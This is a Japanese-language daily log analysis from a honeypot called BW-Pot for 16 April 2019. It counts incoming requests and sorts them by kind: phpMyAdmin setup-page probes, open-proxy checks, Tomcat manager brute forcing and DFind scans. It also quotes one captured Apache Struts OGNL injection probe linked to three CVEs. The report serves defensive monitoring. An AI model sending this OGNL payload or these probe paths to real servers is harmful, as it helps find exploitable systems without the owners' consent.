BW-Potのログ分析 (2019/04/16)
本日の総アクセス件数は149件です。送信元IP数は69IPです。
・Apache Strutsの脆弱性調査と思われる通信を観測
どうやら以下の三つの脆弱性に関する調査のようです
・CVE-2013-2251
・CVE-2017-5638
・CVE-2018-11776
リクエスト
Post / redirect:${#zzz=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#zzz.getWriter().print("xxxfind"),#zzz.getWriter().print("xxx"),#zzz.getWriter().flush(),#zzz.getWriter().close()}
| 件数 | 種別 | リクエスト |
| 62 | アクセス | GET / |
| 72 | phpMyAdminに関する攻撃 | POST /phpmyadmin/ |
| 62 | アクセス | GET / |
| 3 | 不正中継の調査 | GET www.baidu[.]com/ |
| 1 | 不正中継の調査 | GET api.huobi[.]pro/market/detail?symbol=ethusdt |
| 1 | 不正中継の調査 | POST 159.89.182[.]124/tmUnblock.cgi |
| 1 | Apache Strutsに関する調査 | POST / |
| 1 | DFindによるスキャン | GET /w00tw00t.at.ISC.SANS.DFind:) |
| 1 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html |
| 1 | phpMyAdminに関する調査 | GET /MyAdmin/scripts/setup.php |
| 1 | phpMyAdminに関する調査 | GET /myadmin/scripts/setup.php |
| 1 | phpMyAdminに関する調査 | GET /phpMyAdmin/scripts/setup.php |
| 1 | phpMyAdminに関する調査 | GET /phpmyadmin/scripts/setup.php |
| 1 | phpMyAdminに関する調査 | GET /pma/scripts/setup.php |
| 1 | phpMyAdminに関する調査 | GET /w00tw00t.at.blackhats.romanian.anti-sec:) |
| 1 | 不明 | GET /admin/connection/ |
参考リンク
